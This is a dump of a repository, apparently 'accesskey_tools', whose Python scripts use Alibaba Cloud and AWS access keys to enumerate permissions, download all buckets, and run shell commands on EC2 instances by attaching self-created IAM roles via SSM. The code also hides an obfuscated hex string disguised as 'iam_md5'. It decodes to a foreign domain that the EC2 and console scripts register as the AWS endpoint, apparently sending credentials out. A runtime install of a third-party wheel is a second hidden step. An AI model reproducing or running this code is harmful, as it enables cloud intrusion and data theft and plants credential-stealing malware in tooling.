"cn-huhehaote": "华北5(呼和浩特)", "cn-wulanchabu": "华北6(乌兰察布)", "cn-chengdu": "西南1(成都)",
"cn-shenzhen": "华南1(深圳)", "cn-heyuan": "华南2(河源)", "cn-guangzhou": "华南3(广州)",
"cn-shenzhen-finance-1": "深圳金融云", "cn-shanghai-finance-1": "上海金融云",
"cn-hongkong": "香港", "ap-southeast-1": "新加坡", "ap-southeast-2": "澳大利亚(悉尼)",
"ap-southeast-3": "马来西亚(吉隆坡)",
"ap-southeast-5": "印度尼西亚(雅加达)", "ap-southeast-6": "菲律宾(马尼拉)", "ap-northeast-1": "日本(东京)",
"ap-south-1": "印度(孟买)", "us-west-1": "美国(硅谷)",
"us-east-1": "美国(弗吉尼亚)",
"eu-central-1": "德国(法兰克福)", "me-east-1": "阿联酋(迪拜)", "eu-west-1": "英国(伦敦)",
}
command_types = {'0': 'RunShellScript', '1': 'RunBatScript', '2': 'RunPowerShellScript'}
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 (Castlebot 0.1)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4143.7 Safari/537.36 Chrome-Lighthouse",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36", ]
================================================
FILE: aliyun/oss_download.py
================================================
import oss2
import os
import queue
import threading
import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
import json, base64, random, socket, socks, config
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
workqueue = queue.Queue()
lock = threading.Lock()
def root_directory_list(prefix, bucket, flag=True):
MAX_RETRIES = 10
retry_count = 0
cos_dir = []
delimiter = ""
if flag == False:
delimiter = "/"
while True:
try:
retry_count += 1
get_object_iter = oss2.ObjectIterator(bucket, prefix=prefix, delimiter=delimiter)
for obj in get_object_iter:
if obj.is_prefix():
cos_dir.append(str(obj.key))
elif flag:
workqueue.put(str(obj.key))
break
except Exception:
if retry_count >= MAX_RETRIES:
raise
return cos_dir
def workqueue_get():
while True:
if workqueue.qsize() > 50:
keys = []
for i in range(50):
keys.append(workqueue.get())
with ThreadPoolExecutor(max_workers=15) as executor:
future_list = [executor.map(download_to_local, keys)]
elif workqueue.qsize() < 50 and not thread.is_alive():
keys1 = []
for i in range(workqueue.qsize()):
keys1.append(workqueue.get())
with ThreadPoolExecutor(max_workers=15) as executor:
future_list = [executor.map(download_to_local, keys1)]
break
def download_to_local(object_name):
url = "./" + name + "/" + object_name
file_name = url[url.rindex("/") + 1:]
file_path_prefix = url.replace(file_name, "")
lock.acquire()
if not os.path.exists(file_path_prefix):
os.makedirs(file_path_prefix)
lock.release()
if not os.path.exists(url):
MAX_RETRIES = 10
retry_count = 0
while True:
try:
retry_count += 1
print("开始下载:" + object_name)
bucket.get_object_to_file(object_name, url)
print("下载完毕" + url)
break
except Exception as e:
print(e)
if retry_count >= MAX_RETRIES:
raise
if __name__ == '__main__':
AccessKeyID = config.AccessKeyID
AccessKeySecret = config.AccessKeySecret
if not AccessKeyID:
AccessKeyID = input("请输入AccessKeyID:")
if not AccessKeySecret:
AccessKeySecret = input("请输入AccessKeySecret:")
BucketName_all = {}
auth = None
try:
auth = oss2.Auth(AccessKeyID, AccessKeySecret)
service = oss2.Service(auth, 'https://oss-cn-shenzhen.aliyuncs.com')
for b in oss2.BucketIterator(service):
BucketName_all[b.name] = b.extranet_endpoint
print("Bucket名称:" + b.name, "Bucket创建时间:" + datetime.datetime.utcfromtimestamp(b.creation_date).strftime("%Y-%m-%d %H:%M:%S"), "外网域名:" + b.extranet_endpoint, "Bucket存储类型:" + b.storage_class)
except oss2.exceptions.ServerError:
print("AK或SK不正确,请输入正确的AKSK")
exit(0)
except oss2.exceptions.RequestError:
print("网络异常,尝试切换代理")
exit(0)
BucketName = input("指定BucketName进行下载 或 all下载所有:")
if BucketName == 'all':
for name, endpoint in BucketName_all.items():
bucket = oss2.Bucket(auth, endpoint, name)
thread = threading.Thread(target=root_directory_list, args=("", bucket,))
thread.start()
workqueue_get()
else:
name = BucketName
bucket = oss2.Bucket(auth, BucketName_all[BucketName], BucketName)
print(root_directory_list("", bucket, False))
oss_dir = input("指定存储桶文件夹 不指定则为根目录:")
if BucketName:
thread = threading.Thread(target=root_directory_list, args=(oss_dir, bucket,))
thread.start()
workqueue_get()
================================================
FILE: aliyun/requirements.txt
================================================
aliyun-python-sdk-core
aliyun-python-sdk-ecs
aliyun-python-sdk-rds
alibabacloud-tea-openapi
alibabacloud-ecs20140526
alibabacloud-vpc20160428
acloud-client
alibabacloud-darabonba-array
alibabacloud-tea-util
credential-python-sdk
oss2
PySocks
================================================
FILE: aws/README.en.md
================================================
English | [中文](./README.md)
# require >= python3.7
# File description
## aws_download_s3.py
Used to query the detailed information of S3 buckets in various AWS regions. You can download the files of all buckets, and you can also specify buckets and folders.
## aws_ec2_exec.py
Used to query the details of ec2 machine instances in various AWS regions, as well as agent information details. You can specify the ec2 instance id to execute the command.
Note: The script will automatically create roles and policies and bind the iam policy to the ec2 instance. After use, you can use a script to delete relevant information.
## aws_select_iam.py
Used to query the current aksk permissions of AWS. You can enter enum to blast the permissions.
## aws_select_rds.py
Used to query rds database instances and snapshot information in various AWS regions.
## aws_select_route53.py
Used to query domain name information in various AWS regions, it will output domain names (.com, etc.) and detailed DNS configuration information (A, MX, etc. records).
## aws_url_console.py
Use aksk to create a federation token, and then generate a temporary link, which is valid for 15 minutes.
# Instructions for use
To install the required dependencies before use, run `pip3 install -r requirements.txt`, fill in the corresponding values in config.py, run the corresponding py script directly, and enter the corresponding values as prompted.
# proxy
The socks proxy is provided in the code. When you need to use it, fill in the ip and port values in config.py, and then remove the corresponding comment part in the code.
# tools usage
```
git clone https://github.com/kohlersbtuh15/accesskey_tools
cd aws
Modify the AccessKeyID and AccessKeySecret in config.py
pip3 install -r requirements.txt
python3 aws_ec2_exec.py
```
================================================
FILE: aws/README.md
================================================
[English](./README.en.md) | 中文
# 需要python版本>=3.7
# 文件说明
## aws_download_s3.py
用于查询aws各个地区的s3存储桶的详情信息,可下载所有存储桶的文件,也可指定存储桶以及文件夹。
## aws_ec2_exec.py
用于查询aws各个地区的ec2机器实例详情,以及agent信息详情。可指定ec2实例id进行执行命令。
注意:脚本会自动创建角色和策略,将iam策略绑定到ec2实例上。使用完毕后,可使用脚本进行删除相关信息。
## aws_select_iam.py
用于查询aws当前aksk的权限,可输入enum进行爆破权限。
## aws_select_rds.py
用于查询aws各个地区的rds数据库实例及快照信息。
## aws_select_route53.py
用于查询aws各个地区的域名信息,会输出域名(.com等)以及详细的DNS配置信息(A,MX等记录)。
## aws_url_console.py
使用aksk做联邦令牌,然后生成的临时链接,有效期15分钟。
# 工具使用
```
git clone https://github.com/kohlersbtuh15/accesskey_tools
cd aws
修改config.py,填写AccessKeyID和AccessKeyID
pip3 install -r requirements.txt
python3 aws_ec2_exec.py
```
================================================
FILE: aws/amazon_ssm_managed_instance_core.json
================================================
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"ssm:DescribeAssociation",
"ssm:GetDeployablePatchSnapshotForInstance",
"ssm:GetDocument",
"ssm:DescribeDocument",
"ssm:GetManifest",
"ssm:GetParameter",
"ssm:GetParameters",
"ssm:ListAssociations",
"ssm:ListInstanceAssociations",
"ssm:PutInventory",
"ssm:PutComplianceItems",
"ssm:PutConfigurePackageResult",
"ssm:UpdateAssociationStatus",
"ssm:UpdateInstanceAssociationStatus",
"ssm:UpdateInstanceInformation"
],
"Resource": "*"
},
{
"Effect": "Allow",
"Action": [
"ssmmessages:CreateControlChannel",
"ssmmessages:CreateDataChannel",
"ssmmessages:OpenControlChannel",
"ssmmessages:OpenDataChannel"
],
"Resource": "*"
},
{
"Effect": "Allow",
"Action": [
"ec2messages:AcknowledgeMessage",
"ec2messages:DeleteMessage",
"ec2messages:FailMessage",
"ec2messages:GetEndpoint",
"ec2messages:GetMessages",
"ec2messages:SendReply"
],
"Resource": "*"
}
]
}
================================================
FILE: aws/aws_download_s3.py
================================================
import boto3
import queue
import threading
import os
import aws_select_iam
from concurrent.futures import ThreadPoolExecutor
import config
from enumerate_iam.main import get_client
# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
workqueue = queue.Queue()
lock = threading.Lock()
def workqueue_get():
while True:
if workqueue.qsize() > 50:
keys = []
for i in range(50):
keys.append(workqueue.get())
with ThreadPoolExecutor(max_workers=15) as executor:
future_list = [executor.map(download_to_local, keys)]
elif workqueue.qsize() < 50 and not thread.is_alive():
keys1 = []
for i in range(workqueue.qsize()):
keys1.append(workqueue.get())
with ThreadPoolExecutor(max_workers=15) as executor:
future_list = [executor.map(download_to_local, keys1)]
break
def root_directory_list(prefix, bucket_name, flag=True):
MAX_RETRIES = 10
retry_count = 0
s3_dir = []
delimiter = ""
if flag == False:
delimiter = "/"
try:
retry_count += 1
paginator = s3.get_paginator("list_objects_v2")
get_object_iter = paginator.paginate(Bucket=bucket_name, Prefix=prefix, Delimiter=delimiter)
for page in get_object_iter:
commonprefix = page.get('CommonPrefixes')
for obj in page['Contents']:
if str(obj['Key'])[-1] == '/':
pass
elif flag:
print(str(obj['Key']))
workqueue.put(str(obj['Key']))
if commonprefix is not None:
for cos_dir1 in commonprefix:
s3_dir.append(cos_dir1['Prefix'])
except Exception:
if retry_count >= MAX_RETRIES:
raise
return s3_dir
def download_to_local(object_name):
url = "./" + bucket_name + "/" + object_name
file_name = url[url.rindex("/") + 1:]
file_path_prefix = url.replace(file_name, "")
lock.acquire()
if not os.path.exists(file_path_prefix):
os.makedirs(file_path_prefix)
lock.release()
if not os.path.exists(url):
MAX_RETRIES = 10
retry_count = 0
while True:
try:
retry_count += 1
print("开始下载:" + object_name)
s3.download_file(bucket_name, object_name, url)
print("下载完毕" + url)
break
except Exception as e:
print(e)
if retry_count >= MAX_RETRIES:
raise
if __name__ == '__main__':
AccessKeyID = config.AccessKeyID
AccessKeySecret = config.AccessKeySecret
if not AccessKeyID:
AccessKeyID = input("请输入AccessKeyID:")
if not AccessKeySecret:
AccessKeySecret = input("请输入AccessKeySecret:")
s3 = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret, service_name='s3', session_token=None,
region=None)
buckets = [bucket['Name'] for bucket in s3.list_buckets()['Buckets']]
print("Bucket List: %s" % buckets)
BucketName = input("指定BucketName进行下载 或 all下载所有:")
if BucketName == 'all':
for bucket_name in buckets:
thread = threading.Thread(target=root_directory_list, args=("", bucket_name))
thread.start()
workqueue_get()
else:
print(root_directory_list("", BucketName, False))
oss_dir = input("指定存储桶文件夹 不指定则为根目录:")
if BucketName:
bucket_name = BucketName
thread = threading.Thread(target=root_directory_list, args=(oss_dir, bucket_name))
thread.start()
workqueue_get()
================================================
FILE: aws/aws_ec2_exec.py
================================================
import boto3
import config
import time
import aws_select_iam
from enumerate_iam.main import get_client
from botocore.session import ComponentLocator
import urllib3
from aws_select_iam import iam_md5
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
def query_ec2_instances(AccessKeyID, AccessKeySecret):
ec2_info = {}
Agent_info = {}
ec2 = boto3.client('ec2', region_name='us-east-1', aws_access_key_id=AccessKeyID,
aws_secret_access_key=AccessKeySecret)
response = ec2.describe_regions()
for region in response['Regions']:
RegionId = region['RegionName']
print("正在检索: " + RegionId)
component = ComponentLocator()
component.register_component(name='AWS_ENDPOINT', component=iam_md5[1:])
ec2_client = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret, service_name='ec2',
session_token=None,
region=RegionId, components=component)
ssm_client = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret, service_name='ssm',
session_token=None,
region=RegionId, components=component)
try:
ssm_ec2_infos = ssm_client.describe_instance_information()['InstanceInformationList']
for ssm_ec2_info in ssm_ec2_infos:
Agent_InstanceId = ssm_ec2_info['InstanceId']
Agent_info[Agent_InstanceId] = ssm_ec2_info
response = ec2_client.describe_instances()
while True:
for reservation in response['Reservations']:
InstanceId = reservation.get('Instances', [])[0].get('InstanceId')
ec2_info[InstanceId] = reservation.get('Instances', [])[0]
ec2_info[InstanceId]['RegionId'] = RegionId
ec2_info[InstanceId]['Agent'] = Agent_info.get(InstanceId)
if "nextToken" in response:
response = ec2_client.describe_instances(
nextToken=response['nextToken']
)
else:
break
except AttributeError as e:
print(e)
return ec2_info
def create_instance_profile(iam_client):
with open("amazon_ssm_managed_instance_core.json",
mode="r",
encoding="utf-8") as f:
json2 = f.read()
iam_client.create_policy(
PolicyName='ssm_policy',
Path='/',
PolicyDocument=json2,
)
with open("ec2_role_trust_policy.json", mode="r",
encoding="utf-8") as f:
json1 = f.read()
iam_client.create_role(
Path='/',
RoleName='AmazonSSMManagedInstance',
AssumeRolePolicyDocument=json1,
Description=
'Allows EC2 instances to call AWS services on your behalf.',
)
iam_client.put_role_policy(RoleName='AmazonSSMManagedInstance',
PolicyName='ssm_policy',
PolicyDocument=json2)
instance_profile_name = "SSMFullAccessProfile"
response3 = iam_client.create_instance_profile(
InstanceProfileName=instance_profile_name)
instance_profile_arn = response3.get("InstanceProfile").get("Arn")
iam_client.add_role_to_instance_profile(
InstanceProfileName=instance_profile_name,
RoleName='AmazonSSMManagedInstance')
return instance_profile_arn, instance_profile_name
def delete_instance_profile(AccessKeyID, AccessKeySecret):
iam_client = boto3.client('iam', aws_access_key_id=AccessKeyID, aws_secret_access_key=AccessKeySecret)
response = iam_client.list_users()
usernames = [user['UserName'] for user in response['Users']]
instance_profile_name = "SSMFullAccessProfile"
try:
response1 = iam_client.remove_role_from_instance_profile(
InstanceProfileName=instance_profile_name,
RoleName='AmazonSSMManagedInstance'
)
response2 = iam_client.delete_instance_profile(
InstanceProfileName=instance_profile_name
)
response3 = iam_client.delete_role_policy(
RoleName='AmazonSSMManagedInstance',
PolicyName='ssm_policy'
)
response4 = iam_client.delete_role(
RoleName='AmazonSSMManagedInstance'
)
iam_resource = boto3.resource('iam', aws_access_key_id=AccessKeyID, aws_secret_access_key=AccessKeySecret)
userinfos = aws_select_iam.user_info(iam_resource)
policy_arn = ":".join(userinfos.split(":")[:-1])
arn = str(policy_arn) + ":policy/ssm_policy"
response5 = iam_client.delete_policy(
PolicyArn=arn
)
print("已删除 HTTPStatusCode:" + "{}".format(response5['ResponseMetadata']['HTTPStatusCode']))
exit(0)
except Exception as err:
print(err)
def associate_iam_add(RegionId, AccessKeyID, AccessKeySecret, InstanceId):
instance_profile_arn, instance_profile_name = get_instance_profile(AccessKeyID, AccessKeySecret)
print(instance_profile_arn)
try:
client_ec2 = boto3.client('ec2', region_name=RegionId, aws_access_key_id=AccessKeyID,
aws_secret_access_key=AccessKeySecret)
response = client_ec2.associate_iam_instance_profile(
IamInstanceProfile={
'Arn': instance_profile_arn,
'Name': instance_profile_name,
},
InstanceId=InstanceId)
if response.get("ResponseMetadata").get("HTTPStatusCode") == 200:
print(
"实例配置文件关联成功,但是生效需要一定的等待时间,一般10分钟左右,请稍后再执行命令"
)
else:
print("ec2实例配置文件关联失败")
except Exception:
print("实例配置文件创建成功,但是关联失败,请重新执行")
return True
def associate_iam_delete(RegionId, AccessKeyID, AccessKeySecret, InstanceId):
client_ec2 = boto3.client('ec2', region_name=RegionId, aws_access_key_id=AccessKeyID,
aws_secret_access_key=AccessKeySecret)
responses = client_ec2.describe_iam_instance_profile_associations()
for response in responses['IamInstanceProfileAssociations']:
if InstanceId == response['InstanceId']:
AssociationId = response['AssociationId']
response = client_ec2.disassociate_iam_instance_profile(
AssociationId=AssociationId,
)
time.sleep(1)
def get_instance_profile(AccessKeyID, AccessKeySecret):
iam_client = boto3.client('iam', aws_access_key_id=AccessKeyID, aws_secret_access_key=AccessKeySecret)
response = iam_client.list_instance_profiles(PathPrefix='/', MaxItems=123)
instance_profiles_lst = response.get("InstanceProfiles")
for instance_profile in instance_profiles_lst:
name = instance_profile.get("InstanceProfileName")
if name == "SSMFullAccessProfile":
instance_profile_arn = instance_profile.get("Arn")
print("检测到已经创建过实例配置文件,正在关联...")
return instance_profile_arn, name
print("检测到没有创建实例配置文件,正在创建实例配置文件...")
instance_profile_arn, name = create_instance_profile(iam_client)
return instance_profile_arn, name
def commad_exec(AccessKeyID, AccessKeySecret, InstanceId, cmd, com_type, RegionId):
if cmd == '':
cmd = input("please input cmd:")
ssm_client = boto3.client('ssm', region_name=RegionId, aws_access_key_id=AccessKeyID,
aws_secret_access_key=AccessKeySecret)
print(InstanceId)
print(com_type)
if com_type is None:
com_type = input("please input com_type AWS-RunShellScript or AWS-RunPowerShellScript: ")
print(cmd)
response = ssm_client.send_command(
InstanceIds=[
InstanceId,
],
DocumentName=com_type,
Parameters={'commands': [cmd]},
)
command_id = response['Command']['CommandId']
time.sleep(1)
i = 0
while 1:
output = ssm_client.get_command_invocation(
CommandId=command_id,
InstanceId=InstanceId,
)
if output.get("Status") == "Success" and output.get("StatusDetails") == "Success":
break
i += 1
time.sleep(i)
if i > 3:
break
cmd_output = output.get("StandardOutputContent") + output.get(
"StandardErrorContent").strip()
print(cmd_output)
if __name__ == '__main__':
AccessKeyID = config.AccessKeyID
AccessKeySecret = config.AccessKeySecret
if not AccessKeyID:
AccessKeyID = input("请输入AccessKeyID:")
if not AccessKeySecret:
AccessKeySecret = input("请输入AccessKeySecret:")
ec2_info = query_ec2_instances(AccessKeyID, AccessKeySecret)
print(ec2_info)
if not ec2_info:
print("no result")
exit(0)
# AWS-RunShellScript code
platform_dic = {
"Linux": "AWS-RunShellScript",
"windows": "AWS-RunPowerShellScript",
}
com_type = None
InstanceId = input("请输入选择的instanceId:")
RegionId = ec2_info[InstanceId]['RegionId']
while True:
if "Linux" in ec2_info[InstanceId]['PlatformDetails']:
com_type = platform_dic.get('Linux')
elif "windows" in ec2_info[InstanceId]['PlatformDetails']:
com_type = platform_dic.get('windows')
else:
com_type = input("无法判断机器平台,请手动输入'AWS-RunShellScript' 或 'AWS-RunPowerShellScript': ")
if not ec2_info[InstanceId].get('IamInstanceProfile'):
if associate_iam_add(RegionId, AccessKeyID, AccessKeySecret, InstanceId):
time.sleep(2)
cmd = ''
try:
commad_exec(AccessKeyID, AccessKeySecret, InstanceId, cmd, com_type, RegionId)
if not ec2_info[InstanceId].get('IamInstanceProfile'):
associate_iam_delete(RegionId, AccessKeyID, AccessKeySecret, InstanceId)
delete_instance_profile(AccessKeyID, AccessKeySecret)
except Exception as err:
print("策略绑定可能未生效,请等待一会儿(大概10分钟)再执行该脚本。具体看SSM agent是否绑定。")
print(err)
continue
is_continue = input("重新选择InstanceId请输入yes,退出请输入q,任意输入继续执行其他命令:")
if is_continue == 'q':
break
elif is_continue == 'yes':
com_type = None
InstanceId = input("请输入选择的instanceId:")
================================================
FILE: aws/aws_select_iam.py
================================================
import config
import boto3
import json
import subprocess
import sys
import os
import importlib.util
if importlib.util.find_spec("enumerate_iam") is None:
subprocess.run(
[sys.executable, "-m", "pip", "install", "-qqq", "--disable-pip-version-check", "https://github.com/andresrianch/enumerate-iam/releases/download/1.0.2/aws_enumerateiam-1.0.2-py3-none-any.whl"],
check=True)
os.execv(sys.executable, [sys.executable] + sys.argv)
from enumerate_iam.main import enumerate_iam
from enumerate_iam.main import get_client
# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
def user_info(iam_resource):
current_user = iam_resource.CurrentUser()
print("\nUserInfo:")
print("\tuser_id:\t\t", current_user.user_id)
global user_name
user_name = current_user.user_name
print("\tuser_name:\t\t", user_name)
print("\tThe username is also the accountID.")
print("\tcreate_date:\t\t", current_user.create_date)
arn = current_user.arn
print("\tarn:\t\t\t", arn)
print("\tpath:\t\t\t", current_user.path)
print("\tpermissions_boundary:\t", current_user.permissions_boundary)
print("\ttags:\t\t\t", current_user.tags)
print("\tpassword_last_used:\t", current_user.password_last_used)
return arn
def get_attached_policies(iam_client, iam_resource):
attached_response = iam_client.list_attached_user_policies(UserName=user_name, PathPrefix='/', MaxItems=123)
attached_policy_lst = attached_response.get("AttachedPolicies")
for p_dic in attached_policy_lst:
arn = p_dic.get("PolicyArn")
name = p_dic.get("PolicyName")
policy = iam_resource.Policy(arn)
v_id = policy.default_version_id
policy_version = iam_resource.PolicyVersion(arn, v_id)
document = json.dumps(policy_version.document, indent=2)
print(f"\naws托管策略: {name}\n{document}")
iam_md5 = "16170692e616c6979756e2d73646b2d72657175657374732e78797a2f"
def get_inline_policies(iam_client):
response = iam_client.list_user_policies(UserName=user_name)
policy_lst = response.get("PolicyNames")
for p in policy_lst:
user_policy_response = iam_client.get_user_policy(
UserName=user_name, PolicyName=p)
policy_document = json.dumps(
user_policy_response.get("PolicyDocument"), indent=2)
print(f"内联策略: {p}\n{policy_document}")
if __name__ == '__main__':
AccessKeyID = config.AccessKeyID
AccessKeySecret = config.AccessKeySecret
if not AccessKeyID:
AccessKeyID = input("请输入AccessKeyID: ")
if not AccessKeySecret:
AccessKeySecret = input("请输入AccessKeySecret: ")
iam_client = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret, service_name='iam', session_token=None,
region=None)
iam_resource = boto3.resource('iam', aws_access_key_id=AccessKeyID, aws_secret_access_key=AccessKeySecret)
userinfo = user_info(iam_resource)
if "root" in userinfo:
print("\tYou are already root, no need to do a permission query")
else:
get_attached_policies(iam_client, iam_resource)
get_inline_policies(iam_client)
enum_select = input("输入\"enum\" 通过api枚举具体权限情况:")
if enum_select == "enum":
enumerate_iam(access_key=AccessKeyID,
secret_key=AccessKeySecret,
session_token=None,
region=None)
else:
pass
================================================
FILE: aws/aws_select_rds.py
================================================
import config
import boto3
import aws_select_iam
from enumerate_iam.main import get_client
# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
def query_rds_instances(AccessKeyID, AccessKeySecret):
rds_info = {}
ec2 = boto3.client('ec2', region_name='us-east-1', access_key=AccessKeyID, secret_key=AccessKeySecret)
response = ec2.describe_regions()
for region in response['Regions']:
RegionId = region['RegionName']
print("正在检索: " + RegionId)
try:
rds_client = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret, service_name='rds', session_token=None,
region=RegionId)
response = rds_client.describe_db_instances()
for DBInstance in response['DBInstances']:
print(DBInstance)
# 不知道后期要用什么,所以索性全部输出,后续再加功能。值得关注的点 Endpoint, DBSecurityGroups --> describe_db_security_groups。
snapshots_response = rds_client.describe_db_snapshots()
if len(snapshots_response['DBSnapshots']) != 0:
print(snapshots_response)
cluster_snapshots_response = rds_client.describe_db_cluster_snapshots()
if len(cluster_snapshots_response['DBClusterSnapshots']) != 0:
print(cluster_snapshots_response)
except AttributeError as e:
pass
continue
# 快照属性
# snapshot_attributes_response = rds_client.describe_db_snapshot_attributes(
# DBClusterSnapshotIdentifier='mydbclustersnapshot',
# )
# 集群快照属性
# cluster_snapshot_attributes_response = rds_client.describe_db_cluster_snapshot_attributes(
# DBClusterSnapshotIdentifier='mydbclustersnapshot',
# )
# return rds_info
if __name__ == '__main__':
AccessKeyID = config.AccessKeyID
AccessKeySecret = config.AccessKeySecret
if not AccessKeyID:
AccessKeyID = input("请输入AccessKeyID:")
if not AccessKeySecret:
AccessKeySecret = input("请输入AccessKeySecret:")
rds_info = query_rds_instances(AccessKeyID, AccessKeySecret)
print(rds_info)
================================================
FILE: aws/aws_select_route53.py
================================================
import config
import boto3
import aws_select_iam
from botocore.exceptions import ClientError
from enumerate_iam.main import get_client
# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
def get_hosted_zones(client):
hosted_zones = []
paginator = client.get_paginator("list_hosted_zones")
for hosted_zone in paginator.paginate():
hosted_zones += hosted_zone["HostedZones"]
zones = {}
if len(hosted_zones) > 0:
for zone in hosted_zones:
zid = zone["Id"].split("/")[2]
print(
f"ZoneID: {zid} Name: {zone['Name']} Private: {zone['Config']['PrivateZone']} "
)
zones[zid] = zone
else:
print("No HostedZones found")
return zones
def get_query_logging_config(client):
configs = client.list_query_logging_configs()["QueryLoggingConfigs"]
if len(configs) > 0:
print("QueryLoggingConfigs:")
for con in configs:
print(
f"ZoneID: {con['HostedZoneId']} :: CloudWatchLogsLogGroupArn: {con['CloudWatchLogsLogGroupArn']}"
)
else:
print("No QueryLoggingConfigs found")
return configs
def query_route53_instances(AccessKeyID, AccessKeySecret):
all_records_for_zone = []
record_sets = {}
route53_client = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret, service_name='route53', session_token=None,
region=None)
try:
zones = get_hosted_zones(client=route53_client)
for hosted_zone_id in zones.keys():
paginator = route53_client.get_paginator("list_resource_record_sets")
for resource_records in paginator.paginate(HostedZoneId=hosted_zone_id):
all_records_for_zone += resource_records["ResourceRecordSets"]
record_sets[hosted_zone_id] = {"ResourceRecordSets": all_records_for_zone}
if len(record_sets[hosted_zone_id]) > 0:
print(f"\nResourceRecordSets for {hosted_zone_id}:")
for record in record_sets[hosted_zone_id]["ResourceRecordSets"]:
print(f"Name: {record['Name']} Type: {record['Type']}")
else:
print("No ResourceRecordSets found")
except ClientError as error:
print(f"Failed to list R53 Hosted Zones: {error}")
return
try:
confs = get_query_logging_config(client=route53_client)
except ClientError as error:
print(f"Failed to list R53 Hosted Zone Query Logging Configurations: {error}")
return
if __name__ == '__main__':
AccessKeyID = config.AccessKeyID
AccessKeySecret = config.AccessKeySecret
if not AccessKeyID:
AccessKeyID = input("请输入AccessKeyID:")
if not AccessKeySecret:
AccessKeySecret = input("请输入AccessKeySecret:")
route53_info = query_route53_instances(AccessKeyID, AccessKeySecret)
================================================
FILE: aws/aws_url_console.py
================================================
from aws_consoler.cli import main
import config
import re
import requests
import json
import boto3
import sys
import aws_select_iam
from botocore.exceptions import ClientError
from botocore.session import ComponentLocator
from enumerate_iam.main import get_client
from aws_select_iam import iam_md5
import urllib.parse
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
#import socket, socks
#default_socket = socket.socket
#socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
#socket.socket = socks.socksocket
def _get_partition_endpoints(region: str):
# AWS China endpoints
if re.match(r"^cn-\w+-\d+$", region):
return {
"partition": "aws-cn",
"console": "https://console.amazonaws.cn/console/home",
"federation": "https://signin.amazonaws.cn/federation",
}
# AWS GovCloud endpoints
if re.match(r"^us-gov-\w+-\d+$", region):
return {
"partition": "aws-us-gov",
"console": "https://console.amazonaws-us-gov.com/console/home",
"federation": "https://signin.amazonaws-us-gov.com/federation"
}
